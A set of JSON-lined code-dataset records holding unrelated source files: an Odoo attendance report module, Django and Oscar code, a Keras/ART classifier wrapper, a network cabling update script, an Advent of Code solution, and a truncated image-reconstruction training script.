self.pool.get('hr.rpt.attend.emp.day.line').browse(cr, uid, rpt_line_ids, context=context)\n rpt = rptlines[0].rpt_id\n ids = [rpt.id]\n #handle the attend month report parameter\n attend_month_id = context.get('attend_month_id', None)\n emp_attend_month_lines = {}\n if attend_month_id:\n attend_month_line_obj = self.pool.get('hr.rpt.attend.month.line')\n attend_month_line_ids = attend_month_line_obj.search(cr, uid, [('rpt_id','=',attend_month_id)],context=context)\n emp_ids = attend_month_line_obj.read(cr, uid, attend_month_line_ids, ['emp_id'])\n emp_attend_month_lines = dict((item['emp_id'][0],item['id']) for item in emp_ids) \n \n for rpt_line in rptlines:\n #if from attend month report, only print the employees in the attendance report\n if attend_month_id and not emp_attend_month_lines.get(rpt_line.emp_id.id):\n continue\n key_group = '[%s]%s'%(rpt_line.emp_id.emp_code, rpt_line.emp_id.name)\n if not groups.get(key_group):\n #Add the attendance data\n cale_id = rpt_line.period_id.calendar_id.id\n worktime_types = cale_wt_types.get(cale_id)\n if not worktime_types and cale_id:\n sql = 'select distinct b.id,b.sequence,b.name \\\n from resource_calendar_attendance a \\\n join hr_worktime_type b on a.type_id = b.id \\\n where a.calendar_id=%s \\\n order by b.sequence'\n cr.execute(sql, (cale_id,))\n worktime_types = cr.dictfetchall()\n cale_wt_types[cale_id] = worktime_types\n #set the group values\n group_vals = {'name':key_group,\n 'emp_id': rpt_line.emp_id.id,\n 'date_from': rpt.date_from,\n 'date_to': rpt.date_to,\n 'period_type_a_id':(worktime_types and len(worktime_types) >=1) and worktime_types[0]['id'] 
or None,\n 'period_type_b_id':(worktime_types and len(worktime_types) >=2) and worktime_types[1]['id'] or None,\n 'period_type_c_id':(worktime_types and len(worktime_types) >=3) and worktime_types[2]['id'] or None,\n 'line_ids_dict':{}}\n #add the attend month line link id\n if attend_month_id:\n group_vals['attend_month_line_id'] = emp_attend_month_lines.get(group_vals['emp_id'])\n groups[key_group] = group_vals\n #append this line\n group_vals = groups.get(key_group)\n #get the group line values in dict\n group_lines = group_vals['line_ids_dict']\n key_group_line = rpt_line.day\n if not group_lines.get(key_group_line):\n group_lines[key_group_line] = {'day':rpt_line.day,'weekday':rpt_line.p_weekday, 'seq':0}\n #add current data\n group_line = group_lines[key_group_line]\n #set the different attendance work time fields by the line data\n if group_vals.get('period_type_a_id') and rpt_line.period_id.type_id.id == group_vals['period_type_a_id']:\n group_line['sign_in_a'] = rpt_line.sign_in\n group_line['sign_out_a'] = rpt_line.sign_out\n group_line['hours_normal_a'] = rpt_line.hours_normal\n group_line['hours_ot_a'] = rpt_line.hours_ot\n group_line['seq'] = rpt_line.seq\n \n if group_vals.get('period_type_b_id') and rpt_line.period_id.type_id.id == group_vals['period_type_b_id']:\n group_line['sign_in_b'] = rpt_line.sign_in\n group_line['sign_out_b'] = rpt_line.sign_out\n group_line['hours_normal_b'] = rpt_line.hours_normal\n group_line['hours_ot_b'] = rpt_line.hours_ot\n if group_vals.get('period_type_c_id') and rpt_line.period_id.type_id.id == group_vals['period_type_c_id']:\n group_line['sign_in_c'] = rpt_line.sign_in\n group_line['sign_out_c'] = rpt_line.sign_out\n group_line['hours_normal_c'] = rpt_line.hours_normal\n group_line['hours_ot_c'] = rpt_line.hours_ot\n \n #sum and create groups data to DB\n group_ids = []\n attend_empday_group_obj = self.pool.get('attend.empday.group')\n group_list = groups.values()\n group_list.sort(lambda x, y: cmp(x['name'], y['name'])) \n for group in group_list:\n group_lines_list = []\n work_hours = 0\n work_hours_ot = 0\n for line in group['line_ids_dict'].values():\n line['hours_normal_total'] = line.get('hours_normal_a',0) + line.get('hours_normal_b',0) + line.get('hours_normal_c',0)\n line['hours_ot_total'] = line.get('hours_ot_a',0) + line.get('hours_ot_b',0) + line.get('hours_ot_c',0)\n work_hours += line['hours_normal_total']\n work_hours_ot += line['hours_ot_total']\n group_lines_list.append((0,0,line))\n group_lines_list.sort(lambda x, y: cmp(x[2]['seq'], y[2]['seq']))\n group['line_ids'] = group_lines_list\n group['days_attend'] = work_hours/8.0\n group['hours_ot'] = work_hours_ot\n group_ids.append(attend_empday_group_obj.create(cr, uid, group, context=context))\n \n #print attendances by group\n if not group_ids:\n return {'type': 'ir.actions.act_window_close'} \n #return report action\n datas = {'model': 'attend.empday.group','ids': group_ids,}\n context.update({'active_model':'attend.empday.group', 'active_ids':group_ids})\n rpt_action = {'type': 'ir.actions.report.xml', \n 'report_name': 'attend.empday.group', \n 'datas': datas, \n 'nodestroy': True,\n 'context':context}\n return rpt_action\n \nhr_rpt_attend_emp_day()\n\nclass attend_empday_group(osv.osv_memory):\n _name = \"attend.empday.group\"\n _columns = {\n 'name': fields.char('Group', size=64, required=True),\n 'emp_id': fields.many2one('hr.employee', 'Employee',),\n 'date_from': fields.datetime(\"Start Date\", required=True),\n 'date_to': fields.datetime(\"End Date\", 
required=True),\n 'line_ids': fields.one2many('attend.empday.group.line','group_id',string='Group Lines'),\n 'period_type_a_id': fields.many2one('hr.worktime.type', string='Worktime A'),\n 'period_type_b_id': fields.many2one('hr.worktime.type', string='Worktime B'),\n 'period_type_c_id': fields.many2one('hr.worktime.type', string='Worktime C'),\n 'days_attend':fields.float('Attended Days'),\n 'hours_ot':fields.float('Overtime'), \n 'attend_month_line_id':fields.many2one('hr.rpt.attend.month.line', string='Attend Month Line')\n } \n \n def get_report_name(self, cr, uid, id, rpt_name, context=None):\n return \"Attendance Employee Daily Report\"\n \nclass attend_empday_group_line(osv.osv_memory):\n _name = \"attend.empday.group.line\"\n _columns = {\n 'group_id': fields.many2one('attend.empday.group', string='Group'),\n 'seq': fields.integer('Sequence'),\n 'day': fields.char('Day', store=True, size=32),\n 'weekday': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')],string='Day of Week'), \n \n 'sign_in_a':fields.float('Sign In'),\n 'sign_out_a':fields.float('Sign Out'),\n 'hours_normal_a':fields.float('Work Normal'),\n 'hours_ot_a':fields.float('Work OT'),\n \n 'sign_in_b':fields.float('Sign In'),\n 'sign_out_b':fields.float('Sign Out'),\n 'hours_normal_b':fields.float('Work Normal'),\n 'hours_ot_b':fields.float('Work OT'),\n \n 'sign_in_c':fields.float('Sign In'),\n 'sign_out_c':fields.float('Sign Out'),\n 'hours_normal_c':fields.float('Work Normal'),\n 'hours_ot_c':fields.float('Work OT'),\n \n \n 'hours_normal_total':fields.float('Work Normal'),\n 'hours_ot_total':fields.float('Work OT'), \n } \n\nclass hr_rpt_attend_emp_day_line(osv.osv):\n _name = \"hr.rpt.attend.emp.day.line\"\n _description = \"HR Attendance Employee Daily Report Lines\"\n _order = 'seq'\n _columns = { \n 'rpt_id': fields.many2one('hr.rpt.attend.emp.day', 'Report', select=True, required=True, ondelete='cascade'),\n 'seq': fields.integer('Sequence',group_operator='None'),\n 'emp_id': fields.many2one('hr.employee', 'Employee',),\n 'emp_code': fields.related('emp_id','emp_code',string='Code', type='char',store=True),\n 'emp_name': fields.related('emp_id','name',string='Name', type='char'),\n \n #'day': fields.char('Day', store=True, size=32),\n 'day': fields.date(\"Day\", required=True),\n 'period_id': fields.many2one('resource.calendar.attendance','Period'),\n 'p_weekday': fields.related('period_id','dayofweek',type='selection',\n selection=[('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')],\n string='Day of Week'), \n 'p_hour_from': fields.related('period_id','hour_from',type='float',string='From'),\n 'p_hour_to': fields.related('period_id','hour_to',type='float',string='To'),\n 'p_hours_normal': fields.related('period_id','hours_work_normal',type='float',string='Normal'),\n 'p_hour_ot': fields.related('period_id','hours_work_ot',type='float',string='OT'),\n \n 'sign_in':fields.float('Sign In',group_operator='None'),\n 'sign_out':fields.float('Sign Out',group_operator='None'),\n #the hours that working normal in fact\n 'hours_normal':fields.float('Work Normal'),\n #the hours that working OT in fact\n 'hours_ot':fields.float('Work OT'),\n 'is_late':fields.boolean('Be Late'),\n 'is_early':fields.boolean('Leave Early'),\n 'is_absent':fields.boolean('Absenteeism'),\n #the hours that working normal2 in fact\n 'hours_normal2':fields.float('Work Normal2'),\n #the hours that working 
OT2 in fact\n 'hours_ot2':fields.float('Work OT2'),\n 'state': fields.related('rpt_id','state',type='selection',selection=[\n ('draft', 'Draft'),\n ('confirmed', 'Confirmed'),\n ('cancel', 'Cancel'),\n ], string = 'Status', readonly=True), \n \n }\n #called by server action \"action_server_hr_empday_line_pdf\", to print the employee daily attendance\n def print_empday_line_group(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n if not ids:\n return False\n return self.pool.get('hr.rpt.attend.emp.day').print_empday_group(cr, uid, [], context=context, rpt_line_ids = ids)\n \nhr_rpt_attend_emp_day_line()\n\nfrom openerp.report import report_sxw\nfrom openerp.addons.dm_base.rml import rml_parser_ext\n\n\nclass attend_empday_group_print(rml_parser_ext):\n def __init__(self, cr, uid, name, context):\n super(attend_empday_group_print, self).__init__(cr, uid, name, context=context)\n self.localcontext.update({\n 'time': time,\n 'weekday': self.weekday,\n })\n def weekday(self, weekday):\n return int(weekday) + 1\n \nreport_sxw.report_sxw('report.hr.rpt.attend.emp.day', 'hr.rpt.attend.emp.day', 'addons/dmp_hr_attend/wizard/hr_rpt_attend_emp_day.rml', parser=rml_parser_ext, header='internal')\nreport_sxw.report_sxw('report.attend.empday.group','attend.empday.group','addons/dmp_hr_attend/wizard/hr_rpt_attend_emp_day_group.rml',parser=attend_empday_group_print, header='internal') \n\n'''\nGenerate daily attendance wizard, called by button named \"run_report_wizard\" on the form view\n'''\nclass hr_rpt_attend_emp_day_wizard(osv.osv_memory):\n _name = 'hr.rpt.attend.emp.day.wizard'\n _description = 'Generate daily attendances'\n _columns = {\n 'emp_ids' : fields.many2many('hr.employee', string='Selected Employees', required=True),\n }\n \n def default_get(self, cr, uid, fields, context=None):\n vals = super(hr_rpt_attend_emp_day_wizard, self).default_get(cr, uid, fields, context=context)\n if not vals:\n vals = {}\n #employees\n if context.get('active_model','') == 'hr.rpt.attend.emp.day' and context.get('active_id'):\n emp_ids = self.pool.get('hr.rpt.attend.emp.day').read(cr, uid, context.get('active_id'), ['emp_ids'])['emp_ids']\n vals['emp_ids'] = emp_ids\n \n return vals\n \n def set_data(self, cr, uid, ids, context=None):\n emp_ids = self.read(cr, uid, ids[0], ['emp_ids'], context=context)['emp_ids']\n if not emp_ids:\n raise osv.except_osv(_('Error'), _('Please select employees!'))\n \n emp_day_obj = self.pool.get('hr.rpt.attend.emp.day')\n emp_day_id = context.get('active_id')\n #add new emp_ids\n old_emp_ids = emp_day_obj.read(cr, uid, emp_day_id, ['emp_ids'], context=context)['emp_ids']\n new_emp_ids = [(4,emp_id) for emp_id in emp_ids if emp_id not in old_emp_ids]\n if new_emp_ids:\n emp_day_obj.write(cr, uid, emp_day_id, {'emp_ids':new_emp_ids}, context=context)\n #generate data for the selected employees \n return emp_day_obj.run_report(cr, uid, [emp_day_id], context=context, emp_ids=emp_ids)\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"dmp_hr_attend/wizard/hr_rpt_attend_emp_day.py","file_name":"hr_rpt_attend_emp_day.py","file_ext":"py","file_size_in_byte":41245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"226466014","text":"from django.urls import path, include\nfrom .views import EventCreateView, EventRetrieveDestroyUpdateView, EventListView\nfrom rest_framework.routers import DefaultRouter\n\n\nrouter = DefaultRouter()\nrouter.register(r'', 
EventListView)\n\nurlpatterns = [\n path('create/', EventCreateView.as_view()),\n path('<int:pk>/', EventRetrieveDestroyUpdateView.as_view()),\n path('', include(router.urls))\n]\n","sub_path":"apps/event/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"335433763","text":"from art.classifiers import KerasClassifier\nfrom tensorflow.keras.applications.resnet50 import ResNet50, preprocess_input\n\npreprocessing_fn = preprocess_input\n\n\ndef get_art_model(model_kwargs, wrapper_kwargs):\n model = ResNet50(**model_kwargs)\n wrapped_model = KerasClassifier(model, **wrapper_kwargs)\n return wrapped_model\n","sub_path":"armory/baseline_models/keras/keras_resnet50.py","file_name":"keras_resnet50.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"85995077","text":"#!/apollo/sbin/envroot \"$ENVROOT/python3.6/bin/python3.6\"\nimport pandas as pd\nimport xlwt\nimport sys\nfrom dxd_tools_dev.modules import jukebox\nimport argparse\n\n\n'''\nSummary: This script is used to update cabling info from cutsheet to JukeBox. \n\nCommand to execute the script:\n\n/apollo/env/DXDeploymentTools/bin/vc_edit_cabling_jb.py --cutsheet '/home/anudeept/SYD52_BR_AGG_JB.xlsx' --device 'syd52-vc-bar-r1'\n\nusage: vc_edit_cabling_jb.py [-h] -c -d\n\nScript to add new VC device to JukeBox based on cutsheet provided\n\noptional arguments:\n -h, --help show this help message and exit\n -c , --cutsheet Full path to the cutsheet (ex:/home/anudeept/BJS20-HAMboneV7.xlsx)\n -d , --device vc device\n\nVersion:# 2.0\nAuthor : anudeept@ \n'''\n\n\nclass bcolors:\n\tCLEARBLUE = '\\033[96m'\n\tHEADER = '\\033[95m'\n\tOKBLUE = '\\033[94m'\n\tWARNING = '\\033[93m'\n\tOKGREEN = '\\033[92m'\n\tFAIL = '\\033[91m'\n\tENDC = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\ndef parse_args() -> str:\n parser = argparse.ArgumentParser(description=\"Script to add cabling info to JukeBox from cutsheet\")\n parser.add_argument('-d','--device', type=str, metavar = '', required= True, help = 'vc device')\n parser.add_argument('-c','--cutsheet',type=str, metavar = '', required = True, help = 'Full path to the cutsheet (ex: /home/anudeept/BJS20-HAMboneV7.xlsx)')\n return parser.parse_args() \n\n\ndef cabling_info(args):\n print(bcolors.HEADER,f\"Info >> Reading info from Cutsheet\",bcolors.ENDC)\n df = pd.read_excel(args.cutsheet,sheet_name=None)\n df_new = pd.DataFrame()\n \n # verify df \n if len(df) != 0:\n for info in df.items():\n df_new = df_new.append(info[1])\n else:\n print(bcolors.FAIL,f'Error >> Excel sheet is not in the right format, please verify',bcolors.ENDC)\n sys.exit()\n\n df_new = df_new.dropna(axis=0,how='all')\n df_new = df_new.dropna(axis=1,how='all')\n \n # Get list of a side devices\n try:\n a_devices = list(df_new['a_hostname'].unique())\n a_devices = [str(device) for device in a_devices]\n except KeyError:\n print(bcolors.FAIL,f'Error >> Could not find a_hostname column in cutsheet, please check cutsheet',bcolors.ENDC)\n sys.exit()\n\n #Check if required column names are in cutsheet\n try:\n df_cabling = df_new[['a_hostname','a_interface','z_hostname','z_interface']]\n except:\n print(bcolors.FAIL,f'Error >> Cutsheet not in right format for script',bcolors.ENDC)\n print(bcolors.FAIL,f'Error >> Please check 
https://w.amazon.com/bin/view/DXDEPLOY_Automation_Others/Scripts/vc_edit_cabling_jb.py/',bcolors.ENDC)\n sys.exit()\n \n print(bcolors.OKGREEN,f\"INFO >> Cutsheet is valid\",bcolors.ENDC)\n\n print(bcolors.OKBLUE,f'INFO >> Verifying if {args.device} is in cutsheet',bcolors.ENDC)\n\n if args.device not in a_devices:\n print(bcolors.FAIL,f'Error >> {args.device} is not in cutsheet, please check the argument passed',bcolors.ENDC)\n sys.exit()\n else:\n print(bcolors.OKGREEN,f'INFO >> Found {args.device} in cutsheet',bcolors.ENDC)\n \n df_cabling = df_cabling.dropna(axis=0,how='all')\n df_cabling = df_cabling.dropna(axis=1,how='all')\n \n final_df = df_cabling[df_cabling['a_hostname'] == args.device]\n final_df = final_df.dropna(axis=0,how='all')\n final_df = final_df.dropna(axis=1,how='all')\n \n print(bcolors.OKBLUE,f\"Info >> Creating cabling for {args.device}\",bcolors.ENDC)\n \n #get cabling info from JukeBox\n try:\n device_cabling = jukebox.get_device_detail(args.device).data.cabling\n except:\n print(bcolors.FAIL,f\"Error >> Could not get cabling info for {args.device}, please check {args.device} exists in Jukebox and try again\",bcolors.ENDC)\n sys.exit()\n \n print(bcolors.OKBLUE,f\"Info >> Updating cabling info from cutsheet for {args.device}\",bcolors.ENDC)\n \n #Create new cabling info, append data from cutsheet\n for indx,series in final_df.iterrows():\n try:\n new_cabling = jukebox.create_new_cable_info(args.device.strip(),series['a_interface'].strip(),series['z_hostname'].strip(),series['z_interface'].strip(),device_cabling)\n except:\n print(bcolors.FAIL,f'Error >> Could not add cabling info from cutsheet, exiting',bcolors.ENDC)\n \n #Update Jukebox\n try:\n jukebox.edit_jukebox_cabling(args.device,new_cabling)\n except:\n print(bcolors.FAIL,f\"Error >> Could not push cabling info from cutsheet for {args.device}\",bcolors.ENDC)\n sys.exit()\n \n print(bcolors.OKGREEN,f\"Info >> Updated JukeBox, please verify edits : https://jukebox-web.corp.amazon.com/#/pendingEdits\",bcolors.ENDC)\n\ndef main():\n args = parse_args()\n cabling_info(args)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"aws/vc_edit_cabling_jb.py","file_name":"vc_edit_cabling_jb.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"600322852","text":"import itertools\n\nOCCUPIED = \"#\"\nEMPTY = \"L\"\nFLOOR = \".\"\n\nDELTAS = [(dx, dy) for dx in range(-1,2) for dy in range(-1,2) if not dx==dy==0]\n\nwith open(\"input\") as file:\n data = tuple(line.strip() for line in file)\n\ndef p1_tick(data):\n height = len(data)\n width = len(data[0])\n\n rows = []\n for j in range(height):\n row = []\n for i in range(width):\n neighbors=[data[j+dy][i+dx] for dx,dy in DELTAS if 0 <= i+dx < width and 0 <= j+dy < height]\n\n state = data[j][i]\n if state == EMPTY and neighbors.count(OCCUPIED) == 0:\n row.append(OCCUPIED)\n elif state == OCCUPIED and neighbors.count(OCCUPIED) >= 4:\n row.append(EMPTY)\n else:\n row.append(state)\n rows.append(\"\".join(row))\n return tuple(rows)\n\nline_of_sight_neighbors = {}\nheight = len(data)\nwidth = len(data[0])\nfor j in range(height):\n for i in range(width):\n neighbors = []\n for dx, dy in DELTAS:\n for k in itertools.count(1):\n if not (0 <= i+k*dx < width and 0 <= j+k*dy < height):\n break\n if data[j+k*dy][i+k*dx] != FLOOR:\n neighbors.append((i+k*dx, j+k*dy))\n break\n line_of_sight_neighbors[i,j] = neighbors\n\ndef p2_tick(data):\n height = len(data)\n width = len(data[0])\n\n rows = []\n 
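# same sweep as p1_tick, but neighbours come from the precomputed\n # line-of-sight table and the vacate threshold rises from 4 to 5\n 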
for j in range(height):\n row = []\n for i in range(width):\n neighbors=[data[y][x] for x,y in line_of_sight_neighbors[i,j]]\n\n state = data[j][i]\n if state == EMPTY and neighbors.count(OCCUPIED) == 0:\n row.append(OCCUPIED)\n elif state == OCCUPIED and neighbors.count(OCCUPIED) >= 5:\n row.append(EMPTY)\n else:\n row.append(state)\n rows.append(\"\".join(row))\n return tuple(rows)\n\n \noriginal_data = data\n\n#part 1\nwhile True:\n new_data = p1_tick(data)\n if new_data == data:\n break\n data = new_data\n\nprint(sum(row.count(OCCUPIED) for row in data))\n\n#part 2\ndata = original_data\nwhile True:\n new_data = p2_tick(data)\n if new_data == data:\n break\n data = new_data\n\nprint(sum(row.count(OCCUPIED) for row in data))","sub_path":"11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"208643734","text":"from PyQt5.QtCore import Qt\n\nfrom app.data.database import DB\n\nfrom app.extensions.custom_gui import DeletionDialog\nfrom app.editor.custom_widgets import PartyBox\nfrom app.editor.base_database_gui import DragDropCollectionModel\n\nfrom app.data import parties\nfrom app.utilities import str_utils\n\nclass PartyModel(DragDropCollectionModel):\n def data(self, index, role):\n if not index.isValid():\n return None\n if role == Qt.DisplayRole:\n party = self._data[index.row()]\n text = party.nid + \": \" + party.name\n return text\n return None\n\n def create_new(self):\n nids = [d.nid for d in self._data]\n nid = name = str_utils.get_next_name(\"New Party\", nids)\n new_party = parties.PartyPrefab(nid, name, DB.units[0].nid)\n DB.parties.append(new_party)\n return new_party\n\n def delete(self, idx):\n party = self._data[idx]\n nid = party.nid\n affected_levels = [level for level in DB.levels if level.party == nid]\n if affected_levels:\n from app.editor.global_editor.level_menu import LevelModel\n model = LevelModel\n msg = \"Deleting Party %s would affect this level\" % nid\n swap, ok = DeletionDialog.get_swap(affected_levels, model, msg, PartyBox(self.window, exclude=party), self.window)\n if ok:\n self.on_nid_changed(nid, swap.nid)\n else:\n return\n super().delete(idx)\n\n def on_nid_changed(self, old_nid, new_nid):\n # Levels can be effected\n for level in DB.levels:\n if level.party == old_nid:\n level.party = new_nid\n","sub_path":"app/editor/party_editor/party_model.py","file_name":"party_model.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"449352963","text":"from oscar.apps.promotions.models import * # noqa isort:skip\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.translation import pgettext_lazy\n\n\nclass Slide(AbstractPromotion):\n \"\"\"\n Slide promotion that is being displayed in revolution slider \n on home page\n \"\"\"\n _type = 'Slide'\n name = models.CharField(_(\"Name\"), max_length=128)\n header = models.CharField(_(\"Header\"), max_length=128, blank=True,\n null=True)\n subheader = models.CharField(_(\"SubHeader\"), max_length=128, blank=True,\n null=True)\n content = models.CharField(_(\"Content\"), max_length=256, blank=True,\n null=True)\n button_text = models.CharField(_(\"Button Text\"), max_length=128,\n blank=True, null=True)\n position = models.PositiveSmallIntegerField(_(\"Position\"), default=0)\n link_url = ExtendedURLField(\n _('Link URL'), blank=True,\n help_text=_('This is where this 
promotion links to'))\n image = models.ImageField(\n _('Image'), upload_to=settings.OSCAR_PROMOTION_FOLDER,\n max_length=255)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n app_label = 'promotions'\n verbose_name = _(\"Slide\")\n verbose_name_plural = _(\"Slides\")\n ordering = ['position',]\n\n\nclass Icon(AbstractPromotion):\n \"\"\"\n Icon with label displayed on home page\n \"\"\"\n _type = 'Icon' \n name = models.CharField(_(\"Name\"), max_length=128)\n header = models.CharField(_(\"Header\"), max_length=128, blank=True,\n null=True)\n subheader = models.CharField(_(\"SubHeader\"), max_length=128, blank=True,\n null=True)\n position = models.PositiveSmallIntegerField(_(\"Position\"), default=0)\n image = models.ImageField(\n _('Image'), upload_to=settings.OSCAR_PROMOTION_FOLDER,\n max_length=255)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n app_label = 'promotions'\n verbose_name = _(\"Icon\")\n verbose_name_plural = _(\"Icons\")\n ordering = ['position',]\n","sub_path":"promotions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99945904","text":"from exorim import RIM, PhysicalModel\nfrom exorim.definitions import DTYPE, RIM_HPARAMS, MODEL_HPARAMS\nfrom exorim.datasets import NCompanions\nfrom exorim.models import Model, UnetModel\nfrom exorim.utils import residual_plot, plot_to_image\nfrom datetime import datetime\nimport os, time, json\nimport tensorflow as tf\nimport numpy as np\nfrom exorim.utils import nullwriter\n\n\ndef main(args):\n print(args)\n if args.seed is not None:\n tf.random.set_seed(args.seed)\n np.random.seed(args.seed)\n if args.json_override is not None:\n if isinstance(args.json_override, list):\n files = args.json_override\n else:\n files = [args.json_override, ]\n for file in files:\n with open(file, \"r\") as f:\n json_override = json.load(f)\n args_dict = vars(args)\n args_dict.update(json_override)\n\n phys = PhysicalModel(\n pixels=args.pixels,\n wavelength=args.wavelength,\n logim=True,\n oversampling_factor=args.oversampling_factor,\n chi_squared=args.chi_squared,\n plate_scale=args.plate_scale\n )\n\n train_dataset = NCompanions(\n phys=phys,\n total_items=args.total_items,\n batch_size=args.batch_size,\n width=args.width\n )\n if args.architecture == \"unet\":\n model = UnetModel(\n filters=args.filters,\n kernel_size=args.kernel_size,\n filter_scaling=args.filter_scaling,\n input_kernel_size=args.input_kernel_size,\n layers=args.layers,\n block_conv_layers=args.block_conv_layers,\n strides=args.strides,\n activation=args.activation,\n upsampling_interpolation=args.upsampling_interpolation\n )\n elif args.architecture == \"hourglass\":\n model = Model(\n filters=args.filters,\n kernel_size=args.kernel_size,\n filter_scaling=args.filter_scaling,\n input_kernel_size=args.input_kernel_size,\n layers=args.layers,\n block_conv_layers=args.block_conv_layers,\n strides=args.strides,\n activation=args.activation,\n upsampling_interpolation=args.upsampling_interpolation\n )\n else:\n raise ValueError(\"architecture parameters must be in ['hourglass', 'unet']\")\n\n rim = RIM(\n model=model,\n physical_model=phys,\n steps=args.steps,\n adam=True,\n )\n\n learning_rate_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=args.initial_learning_rate,\n 
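# decay_rate=1.0 keeps the learning rate constant; staircase makes the decay step-wise\n 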
decay_rate=args.decay_rate,\n decay_steps=args.decay_steps,\n staircase=args.staircase\n )\n optim = tf.keras.optimizers.deserialize(\n {\n \"class_name\": args.optimizer,\n 'config': {\"learning_rate\": learning_rate_schedule}\n }\n )\n # weights for time steps in the loss function\n if args.time_weights == \"uniform\":\n wt = tf.ones(shape=(args.steps), dtype=DTYPE) / args.steps\n elif args.time_weights == \"linear\":\n wt = 2 * (tf.range(args.steps, dtype=DTYPE) + 1) / args.steps / (args.steps + 1)\n elif args.time_weights == \"quadratic\":\n wt = 6 * (tf.range(args.steps, dtype=DTYPE) + 1) ** 2 / args.steps / (args.steps + 1) / (2 * args.steps + 1)\n else:\n raise ValueError(\"time_weights must be in ['uniform', 'linear', 'quadratic']\")\n wt = wt[..., tf.newaxis] # [steps, batch]\n\n if args.residual_weights == \"uniform\":\n w = tf.keras.layers.Lambda(lambda s: tf.ones_like(s, dtype=DTYPE) / tf.cast(tf.math.reduce_prod(s.shape[1:]), DTYPE))\n elif args.residual_weights == \"linear\":\n w = tf.keras.layers.Lambda(lambda s: s / tf.reduce_sum(s, axis=(1, 2, 3), keepdims=True))\n elif args.residual_weights == \"quadratic\":\n w = tf.keras.layers.Lambda(lambda s: tf.square(s) / tf.reduce_sum(tf.square(s), axis=(1, 2, 3), keepdims=True))\n elif args.residual_weights == \"sqrt\":\n w = tf.keras.layers.Lambda(lambda s: tf.sqrt(s) / tf.reduce_sum(tf.sqrt(s), axis=(1, 2, 3), keepdims=True))\n else:\n raise ValueError(\"residual_weights must be in ['uniform', 'linear', 'quadratic', 'sqrt']\")\n\n # ==== Take care of where to write logs and stuff =================================================================\n if args.model_id.lower() != \"none\":\n if args.logname is not None:\n logname = args.model_id + \"_\" + args.logname\n model_id = args.model_id\n else:\n logname = args.model_id + \"_\" + datetime.now().strftime(\"%y-%m-%d_%H-%M-%S\")\n model_id = args.model_id\n elif args.logname is not None:\n logname = args.logname\n model_id = logname\n else:\n logname = args.logname_prefixe + \"_\" + datetime.now().strftime(\"%y-%m-%d_%H-%M-%S\")\n model_id = logname\n if args.logdir.lower() != \"none\":\n logdir = os.path.join(args.logdir, logname)\n if not os.path.isdir(logdir):\n os.mkdir(logdir)\n writer = tf.summary.create_file_writer(logdir)\n else:\n writer = nullwriter()\n # ===== Make sure directory and checkpoint manager are created to save model ===================================\n if args.model_dir.lower() != \"none\":\n checkpoints_dir = os.path.join(args.model_dir, logname)\n old_checkpoints_dir = os.path.join(args.model_dir, model_id) # in case they differ we load model from a different directory\n if not os.path.isdir(checkpoints_dir):\n os.mkdir(checkpoints_dir)\n with open(os.path.join(checkpoints_dir, \"script_params.json\"), \"w\") as f:\n json.dump(vars(args), f, indent=4)\n with open(os.path.join(checkpoints_dir, \"model_hparams.json\"), \"w\") as f:\n hparams_dict = {key: vars(args)[key] for key in MODEL_HPARAMS}\n json.dump(hparams_dict, f, indent=4)\n with open(os.path.join(checkpoints_dir, \"rim_hparams.json\"), \"w\") as f:\n hparams_dict = {key: vars(args)[key] for key in RIM_HPARAMS}\n json.dump(hparams_dict, f, indent=4)\n ckpt = tf.train.Checkpoint(step=tf.Variable(1), optimizer=optim, net=rim.model)\n checkpoint_manager = tf.train.CheckpointManager(ckpt, old_checkpoints_dir, max_to_keep=args.max_to_keep)\n save_checkpoint = True\n # ======= Load model if model_id is provided ===============================================================\n if args.model_id.lower() 
!= \"none\":\n checkpoint_manager.checkpoint.restore(checkpoint_manager.latest_checkpoint)\n if old_checkpoints_dir != checkpoints_dir: # save progress in another directory.\n if args.reset_optimizer_states:\n optim = tf.keras.optimizers.deserialize(\n {\n \"class_name\": args.optimizer,\n 'config': {\"learning_rate\": learning_rate_schedule}\n }\n )\n ckpt = tf.train.Checkpoint(step=tf.Variable(1), optimizer=optim, net=rim.model)\n checkpoint_manager = tf.train.CheckpointManager(ckpt, checkpoints_dir, max_to_keep=args.max_to_keep)\n else:\n save_checkpoint = False\n\n # =================================================================================================================\n\n def train_step(X, Y, noise_rms):\n with tf.GradientTape() as tape:\n tape.watch(rim.model.trainable_variables)\n y_pred_series, chi_squared = rim.call(X, noise_rms, outer_tape=tape)\n # weighted mean over image residuals\n cost = tf.reduce_sum(w(Y) * tf.square(y_pred_series - rim.inverse_link_function(Y)), axis=(2, 3, 4))\n # weighted mean over time steps\n cost = tf.reduce_sum(wt * cost, axis=0)\n # final cost is mean over global batch size\n cost = tf.reduce_mean(cost)\n gradient = tape.gradient(cost, rim.model.trainable_variables)\n 